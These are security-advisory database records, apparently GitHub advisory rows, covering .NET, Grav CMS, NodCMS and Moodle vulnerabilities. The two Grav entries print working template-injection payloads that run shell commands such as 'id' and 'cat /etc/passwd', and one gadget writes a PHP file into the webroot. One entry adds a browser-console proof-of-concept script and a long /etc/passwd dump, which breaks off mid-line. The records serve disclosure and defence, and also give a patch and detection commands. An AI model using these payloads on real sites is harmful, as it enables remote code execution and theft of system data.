| ------------------------- [Microsoft.NetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm) | >= 6.0.0, <= 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm64) | >= 6.0.0, <= 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x64) | >= 6.0.0, <= 6.0.16 | 6.0.18 [Microsoft.NetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x86) | >= 6.0.0, <= 6.0.16 | 6.0.18 ## Advisory FAQ ### How do I know if I am affected? If you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability. ### How do I fix the issue? * To fix the issue please install the latest version of .NET 6.0 or .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs. * If you are using one of the affected packages, please update to the patched version listed above. * If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following; ``` .NET Core SDK (reflecting any global.json): Version: 6.0.300 Commit: 8473146e7d Runtime Environment: OS Name: Windows OS Version: 10.0.18363 OS Platform: Windows RID: win10-x64 Base Path: C:\Program Files\dotnet\sdk\6.0.300\ Host (useful for support): Version: 6.0.5 Commit: 8473146e7d .NET Core SDKs installed: 6.0.300 [C:\Program Files\dotnet\sdk] .NET Core runtimes installed: Microsoft.AspNetCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App] Microsoft.NETCore.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App] Microsoft.WindowsDesktop.App 6.0.5 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App] To install additional .NET Core runtimes or SDKs: https://aka.ms/dotnet-download ``` * If you're using .NET 7.0, you should download and install Runtime 7.0.7 or SDK 7.0.106 (for Visual Studio 2022 v17.4) from https://dotnet.microsoft.com/download/dotnet-core/7.0. * If you're using .NET 6.0, you should download and install Runtime 6.0.18 or SDK 6.0.312 (for Visual Studio 2022 v17.2) from https://dotnet.microsoft.com/download/dotnet-core/6.0. .NET 6.0 and and .NET 7.0 updates are also available from Microsoft Update. To access this either type ""Check for updates"" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. ## Other Information ### Reporting Security Issues If you have found a potential security issue in .NET 6.0 or .NET 7.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at . ### Support You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. ### Disclaimer The information provided in this advisory is provided ""as is"" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ### External Links [CVE-2023-24897]( https://www.cve.org/CVERecord?id=2023-24897) ### Revisions V1.0 (June 13, 2023): Advisory published. _Version 1.0_ _Last Updated 2023-06-13_","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x86'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.5'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x64'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x86'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.18'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.16'}}]","[{'type': 'WEB', 'url': 'https://github.com/dotnet/runtime/security/advisories/GHSA-88q2-h5g3-p4pg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24897'}, {'type': 'WEB', 'url': 'https://github.com/dotnet/announcements/issues/260'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/runtime'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-24897'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T17:01:16Z', 'nvd_published_at': None}" 1.4.0,GHSA-96xv-rmwj-6p9w,2023-06-16T19:36:39Z,2023-06-16T19:36:39Z,,['CVE-2023-34252'],Grav Server-side Template Injection (SSTI) via Twig Default Filters,"Hi, actually we have sent the bug report to [security@getgrav.org](mailto:security@getgrav.org) on 27th March 2023 and on 10th April 2023. # Grav Server-side Template Injection (SSTI) via Insufficient Validation in filterFilter ## Summary: | **Product** | Grav CMS | | ----------------------- | --------------------------------------------- | | **Vendor** | Grav | | **Severity** | High - Users with login access to Grav Admin panel and page creation/update permissions are able to obtain remote code/command execution | | **Affected Versions** | <= [v1.7.40](https://github.com/getgrav/grav/tree/1.7.40) (Commit [685d762](https://github.com/getgrav/grav/commit/685d76231a057416651ed192a6a2e83720800e61)) (Latest version as of writing) | | **Tested Versions** | v1.7.40 | | **Internal Identifier** | STAR-2023-0007 | | **CVE Identifier** | TBD | | **CWE(s)** | CWE-20: Improper Input Validation, CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine | ## CVSS3.1 Scoring System: **Base Score:** 7.2 (High) **Vector String:** `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H` | **Metric** | **Value** | | ---------------------------- | --------- | | **Attack Vector (AV)** | Network | | **Attack Complexity (AC)** | Low | | **Privileges Required (PR)** | High | | **User Interaction (UI)** | None | | **Scope (S)** | Unchanged | | **Confidentiality \(C)** | High | | **Integrity (I)** | High | | **Availability (A)** | High | ## Product Overview: Grav is a PHP-based flat-file content management system (CMS) designed to provide a fast and simple way to build websites. It supports rendering of web pages written in Markdown and Twig expressions, and provides an administration panel to manage the entire website via an optional Admin plugin. ## Vulnerability Summary: There is a logic flaw in the `GravExtension.filterFilter()` function whereby validation against a denylist of unsafe functions is only performed when the argument passed to filter is a string. However, passing an array as a callable argument allows the validation check to be skipped. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution. ## Vulnerability Details: The vulnerability can be found in the `GravExtension.filterFilter()` function declared in [`/system/src/Grav/Common/Twig/Extension/GravExtension.php`](https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Twig/Extension/GravExtension.php#L1692-L1698): ~~~php ... class GravExtension extends AbstractExtension implements GlobalsInterface { ... /** * Return a list of all filters. * * @return array */ public function getFilters(): array { return [ ... // Security fix new TwigFilter('filter', [$this, 'filterFilter'], ['needs_environment' => true]), ]; } ... /** * @param Environment $env * @param array $array * @param callable|string $arrow * @return array|CallbackFilterIterator * @throws RuntimeError */ function filterFilter(Environment $env, $array, $arrow) { if (is_string($arrow) && Utils::isDangerousFunction($arrow)) { // [1] throw new RuntimeError('Twig |filter(""' . $arrow . '"") is not allowed.'); } return \twig_array_filter($env, $array, $arrow); // [2] } } ~~~ At [1], the `$arrow` parameter contains the argument supplied to the filter. For example, it may refer to `""funcname""` in `{{ array|filter(""funcname"") }}` or the closure (a.k.a. arrow function) `el => el != 'exclude'` in `{{ array|filter(el => el != 'exclude') }}`. Observe that `Utils::isDangerousFunction($arrow)` is only invoked if `$arrow` is a string. As such, non-string arguments may be passed to `twig_array_filter()` at [2] due to the absence of type enforcement at [1]. The implementation of the `twig_array_filter()` function can be found in [/src/Extension/CoreExtension.php](https://github.com/twigphp/Twig/blob/v1.44.7/src/Extension/CoreExtension.php) within Twig's codebase: ~~~php function twig_array_filter(Environment $env, $array, $arrow) { if (!twig_test_iterable($array)) { throw new RuntimeError(sprintf('The ""filter"" filter expects an array or ""Traversable"", got ""%s"".', \is_object($array) ? \get_class($array) : \gettype($array))); } if (!$arrow instanceof Closure && $env->hasExtension('\Twig\Extension\SandboxExtension') && $env->getExtension('\Twig\Extension\SandboxExtension')->isSandboxed()) { // [3] throw new RuntimeError('The callable passed to ""filter"" filter must be a Closure in sandbox mode.'); } if (\is_array($array)) { if (\PHP_VERSION_ID >= 50600) { return array_filter($array, $arrow, \ARRAY_FILTER_USE_BOTH); // [4] } return array_filter($array, $arrow); } // the IteratorIterator wrapping is needed as some internal PHP classes are \Traversable but do not implement \Iterator return new \CallbackFilterIterator(new \IteratorIterator($array), $arrow); } ~~~ At [3], a runtime error is thrown if `$arrow` is not a closure and Twig sandbox is enabled. However, since Grav does not use the Twig Sandbox extension, the check passes successfully even when `$arrow` is not a closure. Subsequently at [4], `array_filter()` is invoked with the user-controlled `$array` input and `$arrow` parameter. Note that the method signature of `array_filter()` is as follows: ~~~php array_filter(array $array, ?callable $callback = null, int $mode = 0): array ~~~ A common mistake that developers make is assuming that the `callable` type refers to a `string` type. This is untrue, and it is [well documented in the PHP Manual](https://www.php.net/manual/en/language.types.callable.php): > A method of an instantiated object is passed as an **array containing an object at index 0 and the method name at index 1**. Accessing protected and private methods from within a class is allowed. > Static class methods can also be passed without instantiating an object of that class by either, **passing the class name instead of an object at index 0, or passing `ClassName::methodName`**. This means that all of the following method calls are valid: ~~~php // Type 1: Simple callback -- invokes system(""id"") array_filter(array(""id""), ""system""); // Type 2: Static class method call -- invokes Class::staticMethod($arg) array_filter(array($arg), array(""Class"", ""staticMethod"")); array_filter(array($arg), array(""Class::staticMethod"")); // same as above // Type 3: Object method call -- invokes $obj->method($arg) array_filter(array($arg), array($obj, ""method"")); ~~~ Going back to [1], if `$arrow` is an `array` instead of a `string` or `closure`, the validation check to prevent invocation of unsafe functions is completely skipped. Multiple static class methods within Grav's codebase and its dependencies were found to be suitable gadgets for achieving for remote code execution: ~~~twig // Gadget 1: Using \Grav\Common\Utils::arrayFilterRecursive() within Grav's codebase to invoke system(""id""): {% set id = {'id': 0} %} {{ {'system': id} | filter('\\Grav\\Common\\Utils', 'arrayFilterRecursive') }} // Gadget 2: Using \Symfony\Component\VarDumper\Vardumper::setHandler() and \Symfony\Component\VarDumper\Vardumper::dump() to invoke system(""id""): {{ ['system'] | filter(['\\Symfony\\Component\\VarDumper\\VarDumper', 'setHandler'])}} {{ ['id'] | filter(['\\Symfony\\Component\\VarDumper\\VarDumper', 'dump']) }} // Gadget 3: Using \RocketTheme\Toolbox\File\File::instance() in Grav's default theme to perform arbitrary file write to rce.php in the webroot: {{ (['rce.php'] | map(['\\RocketTheme\\Toolbox\\File\\File', 'instance']))[0].save(' e.run()) | print_r }} ~~~ ## Exploit Conditions: This vulnerability can be exploited if the attacker has access to: 1. an administrator account, or 2. a non-administrator, user account that are granted the following permissions: - login access to Grav admin panel, and - page creation or update rights ## Reproduction Steps: 1. Log in to Grav Admin using an administrator account. 2. Navigate to `Accounts > Add`, and ensure that the following permissions are assigned when creating a new low-privileged user: * Login to Admin - Allowed * Page Update - Allowed 3. Log out of Grav Admin, and log back in using the account created in step 2. 4. Navigate to `http:///admin/pages/home`. 5. Click the `Advanced` tab and select the checkbox beside `Twig` to ensure that Twig processing is enabled for the modified webpage. 6. Under the `Content` tab, insert the following payload within the editor: ~~~twig // Gadget 1: Using \Grav\Common\Utils::arrayFilterRecursive() within Grav's codebase to invoke system(""id""): {% set id = {'id': 0} %} {{ {'system': id} | filter('\\Grav\\Common\\Utils', 'arrayFilterRecursive') }} ~~~ 7. Click the Preview button. Observe that the output of the `id` shell command is returned in the preview. ## Suggested Mitigations: Patch the logic flaw in the `GravExtension.filterFilter()` function declared in `/system/src/Grav/Common/Twig/Extension/GravExtension.php` to ensure that the `$arrow` paramater passed to the `filterFilter()` function must either be a `string` or an arrow function as such: ~~~diff php ... class GravExtension extends AbstractExtension implements GlobalsInterface { ... /** * @param Environment $env * @param array $array * @param callable|string $arrow * @return array|CallbackFilterIterator * @throws RuntimeError */ function filterFilter(Environment $env, $array, $arrow) { - if (is_string($arrow) && Utils::isDangerousFunction($arrow)) { + if (!$arrow instanceof Closure && !is_string($arrow) || Utils::isDangerousFunction($arrow)) { throw new RuntimeError('Twig |filter(""' . $arrow . '"") is not allowed.'); } return \twig_array_filter($env, $array, $arrow); } } ~~~ `Utils::isDangerousFunction()` in [/system/src/Grav/Common/Utils.php](https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1956-L2074) should also be patched to prevent static class methods from being invoked. For example, ~~~diff php ... abstract class Utils { ... /** * @param string $name * @return bool */ public static function isDangerousFunction(string $name): bool { ... + if (is_array($name) || strpos($name, "":"") !== false) { + return false; + } if (in_array($name, $commandExecutionFunctions)) { return true; } if (in_array($name, $codeExecutionFunctions)) { return true; } if (isset($callbackFunctions[$name])) { return true; } if (in_array($name, $informationDiscosureFunctions)) { return true; } if (in_array($name, $otherFunctions)) { return true; } return static::isFilesystemFunction($name); } ... } ~~~ End users should also ensure that `twig.undefined_functions` and `twig.undefined_filters` properties in `/path/to/webroot/system/config/system.yaml` configuration file are set to `false` to disallow Twig from treating undefined filters/functions as PHP functions and executing them. ## Detection Guidance: The following strategies may be used to detect potential exploitation attempts. 1. Searching within Markdown pages using the following shell command: `grep -Priz -e '\|\s*(filter|map|reduce)\s*\(' /path/to/webroot/user/pages/` 2. Searching within Doctrine cache data using the following shell command: `grep -Priz -e '\|\s*(filter|map|reduce)\s*\(' --include '*.doctrinecache.data' /path/to/webroot/cache/` 3. Searching within Twig cache using the following shell command: `grep -Priz -e 'twig_array_(filter|map|reduce)' /path/to/webroot/cache/twig/` 4. Searching within compiled Twig template files using the following shell command: `grep -Priz -e '\|\s*(filter|map|reduce)\s*\(' /path/to/webroot/cache/compiled/files/` Note that it is not possible to detect indicators of compromise reliably using the Grav log file (located at `/path/to/webroot/logs/grav.log` by default), as successful exploitation attempts do not generate any additional logs. However, it is worthwhile to examine any PHP errors or warnings logged to determine the existence of any failed exploitation attempts. ## Credits: Ngo Wei Lin ([@Creastery](https://twitter.com/Creastery)) & Wang Hengyue ([@w_hy_04](https://twitter.com/w_hy_04)) of STAR Labs SG Pte. Ltd. ([@starlabs_sg](https://twitter.com/starlabs_sg)) Kindly note that STAR Labs reserved and assigned the following CVE identifiers to the respective vulnerabilities presented in this report: 1. **CVE-2023-30595** Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in `GravExtension.filterFilter()` and to achieve remote code execution via usage of fully-qualified names, supplied as arrays of strings, when referencing callables. This is a bypass of CVE-2022-2073.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'getgrav/grav'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.42'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/getgrav/grav/security/advisories/GHSA-96xv-rmwj-6p9w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34252'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5'}, {'type': 'PACKAGE', 'url': 'https://github.com/getgrav/grav'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Twig/Extension/GravExtension.php#L1692-L1698'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1956-L2074'}]","{'cwe_ids': ['CWE-1336', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-16T19:36:39Z', 'nvd_published_at': None}" 1.4.0,GHSA-7xqx-xwg9-jx34,2023-06-27T22:22:11Z,2023-06-20T15:31:08Z,,['CVE-2020-20697'],NodCMS Cross Site Scripting vulnerability,Cross Site Scripting vulnerability in khodakhah NodCMS v.3.0 allows an attacker with administrative privileges to execute arbitrary code and gain access to sensitive information via a crafted script to the address parameter.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'khodakhah/nodcms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-20697'}, {'type': 'WEB', 'url': 'https://github.com/khodakhah/nodcms/issues/41'}, {'type': 'PACKAGE', 'url': 'https://github.com/khodakhah/nodcms'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T22:10:00Z', 'nvd_published_at': None}" 1.4.0,GHSA-49mv-vfcp-8gg9,2023-06-30T20:23:28Z,2023-06-22T21:30:49Z,,['CVE-2023-35132'],Moodle vulnerable to SQL Injection,"A limited SQL injection risk was identified on the Mnet SSO access control page. This flaw affects Moodle versions 4.2, 4.1 to 4.1.3, 4.0 to 4.0.8, 3.11 to 3.11.14, 3.9 to 3.9.21 and earlier unsupported versions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.1'}]}], 'versions': ['4.2.0']}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.9'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.10.0'}, {'fixed': '3.11.15'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.22'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35132'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7A72KX4WU6GK2CX4TKYFGFASPKOEOJFC/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I5QAEAGJ44NVXLAJFJXKARKC45OGEDXT/'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=447830'}, {'type': 'WEB', 'url': 'http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-77193'}]","{'cwe_ids': ['CWE-89'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-23T21:38:31Z', 'nvd_published_at': None}" 1.4.0,GHSA-f9jf-4cp4-4fq5,2023-06-16T19:35:56Z,2023-06-16T19:35:56Z,,['CVE-2023-34251'],Grav Server Side Template Injection (SSTI) vulnerability,"### Summary I found an RCE(Remote Code Execution) by SSTI in the admin screen. ### Details Remote Code Execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges. ### PoC 1. Log in to the administrator screen and access the edit screen of the default page ""Typography"". (`http://127.0.0.1:8000/admin/pages/typography`) 2. Open the browser's console screen and execute the following JavaScript code to confirm that an arbitrary command (`id`) is being executed. ```js (async () => { const nonce = document.querySelector(""input[name=admin-nonce]"").value; const id = document.querySelector(""input[name=__unique_form_id__]"").value; const payload = ""{{['id']|map('system')|join}}""; // SSTI Payload const params = new URLSearchParams(); params.append(""task"", ""save""); params.append(""data[header][title]"", ""poc""); params.append(""data[content]"", payload); params.append(""data[folder]"", ""poc""); params.append(""data[route]"", """"); params.append(""data[name]"", ""default""); params.append(""data[header][body_classes]"", """"); params.append(""data[ordering]"", 1); params.append(""data[order]"", """"); params.append(""toggleable_data[header][process]"", ""on""); params.append(""data[header][process][twig]"", 1); params.append(""data[header][order_by]"", """"); params.append(""data[header][order_manual]"", """"); params.append(""data[blueprint"", """"); params.append(""data[lang]"", """"); params.append(""_post_entries_save"", ""edit""); params.append(""__form-name__"", ""flex-pages""); params.append(""__unique_form_id__"", id); params.append(""admin-nonce"", nonce); await fetch(""http://127.0.0.1:8000/admin/pages/typography"", { method: ""POST"", headers: { ""content-type"": ""application/x-www-form-urlencoded"", }, body: params, }); window.open(""http://127.0.0.1:8000/admin/pages/poc/:preview""); })(); ``` #### Execution Result - Payload: `{{['id']|map('system')|join}}` ```sh uid=501() gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae) uid=501() gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh),400(com.apple.access_remote_ae) ``` - Payload: `{{['cat /etc/passwd']|map('system')|join}}` ```sh ## # User Database # # Note that this file is consulted directly only when the system is running # in single-user mode. At other times this information is provided by # Open Directory. # # See the opendirectoryd(8) man page for additional information about # Open Directory. ## nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:*:0:0:System Administrator:/var/root:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false _uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico _taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false _networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false _installassistant:*:25:25:Install Assistant:/var/empty:/usr/bin/false _lp:*:26:26:Printing Services:/var/spool/cups:/usr/bin/false _postfix:*:27:27:Postfix Mail Server:/var/spool/postfix:/usr/bin/false _scsd:*:31:31:Service Configuration Service:/var/empty:/usr/bin/false _ces:*:32:32:Certificate Enrollment Service:/var/empty:/usr/bin/false _appstore:*:33:33:Mac App Store Service:/var/db/appstore:/usr/bin/false _mcxalr:*:54:54:MCX AppLaunch:/var/empty:/usr/bin/false _appleevents:*:55:55:AppleEvents Daemon:/var/empty:/usr/bin/false _geod:*:56:56:Geo Services Daemon:/var/db/geod:/usr/bin/false _devdocs:*:59:59:Developer Documentation:/var/empty:/usr/bin/false _sandbox:*:60:60:Seatbelt:/var/empty:/usr/bin/false _mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false _ard:*:67:67:Apple Remote Desktop:/var/empty:/usr/bin/false _www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false _eppc:*:71:71:Apple Events User:/var/empty:/usr/bin/false _cvs:*:72:72:CVS Server:/var/empty:/usr/bin/false _svn:*:73:73:SVN Server:/var/empty:/usr/bin/false _mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false _sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false _qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false _cyrus:*:77:6:Cyrus Administrator:/var/imap:/usr/bin/false _mailman:*:78:78:Mailman List Server:/var/empty:/usr/bin/false _appserver:*:79:79:Application Server:/var/empty:/usr/bin/false _clamav:*:82:82:ClamAV Daemon:/var/virusmails:/usr/bin/false _amavisd:*:83:83:AMaViS Daemon:/var/virusmails:/usr/bin/false _jabber:*:84:84:Jabber XMPP Server:/var/empty:/usr/bin/false _appowner:*:87:87:Application Owner:/var/empty:/usr/bin/false _windowserver:*:88:88:WindowServer:/var/empty:/usr/bin/false _spotlight:*:89:89:Spotlight:/var/empty:/usr/bin/false _tokend:*:91:91:Token Daemon:/var/empty:/usr/bin/false _securityagent:*:92:92:SecurityAgent:/var/db/securityagent:/usr/bin/false _calendar:*:93:93:Calendar:/var/empty:/usr/bin/false _teamsserver:*:94:94:TeamsServer:/var/teamsserver:/usr/bin/false _update_sharing:*:95:-2:Update Sharing:/var/empty:/usr/bin/false _installer:*:96:-2:Installer:/var/empty:/usr/bin/false _atsserver:*:97:97:ATS Server:/var/empty:/usr/bin/false _ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false _unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false _softwareupdate:*:200:200:Software Update Service:/var/db/softwareupdate:/usr/bin/false _coreaudiod:*:202:202:Core Audio Daemon:/var/empty:/usr/bin/false _screensaver:*:203:203:Screensaver:/var/empty:/usr/bin/false _locationd:*:205:205:Location Daemon:/var/db/locationd:/usr/bin/false _trustevaluationagent:*:208:208:Trust Evaluation Agent:/var/empty:/usr/bin/false _timezone:*:210:210:AutoTimeZoneDaemon:/var/empty:/usr/bin/false _lda:*:211:211:Local Delivery Agent:/var/empty:/usr/bin/false _cvmsroot:*:212:212:CVMS Root:/var/empty:/usr/bin/false _usbmuxd:*:213:213:iPhone OS Device Helper:/var/db/lockdown:/usr/bin/false _dovecot:*:214:6:Dovecot Administrator:/var/empty:/usr/bin/false _dpaudio:*:215:215:DP Audio:/var/empty:/usr/bin/false _postgres:*:216:216:PostgreSQL Server:/var/empty:/usr/bin/false _krbtgt:*:217:-2:Kerberos Ticket Granting Ticket:/var/empty:/usr/bin/false _kadmin_admin:*:218:-2:Kerberos Admin Service:/var/empty:/usr/bin/false _kadmin_changepw:*:219:-2:Kerberos Change Password Service:/var/empty:/usr/bin/false _devicemgr:*:220:220:Device Management Server:/var/empty:/usr/bin/false _webauthserver:*:221:221:Web Auth Server:/var/empty:/usr/bin/false _netbios:*:222:222:NetBIOS:/var/empty:/usr/bin/false _warmd:*:224:224:Warm Daemon:/var/empty:/usr/bin/false _dovenull:*:227:227:Dovecot Authentication:/var/empty:/usr/bin/false _netstatistics:*:228:228:Network Statistics Daemon:/var/empty:/usr/bin/false _avbdeviced:*:229:-2:Ethernet AVB Device Daemon:/var/empty:/usr/bin/false _krb_krbtgt:*:230:-2:Open Directory Kerberos Ticket Granting Ticket:/var/empty:/usr/bin/false _krb_kadmin:*:231:-2:Open Directory Kerberos Admin Service:/var/empty:/usr/bin/false _krb_changepw:*:232:-2:Open Directory Kerberos Change Password Service:/var/empty:/usr/bin/false _krb_kerberos:*:233:-2:Open Directory Kerberos:/var/empty:/usr/bin/false _krb_anonymous:*:234:-2:Open Directory Kerberos Anonymous:/var/empty:/usr/bin/false _assetcache:*:235:235:Asset Cache 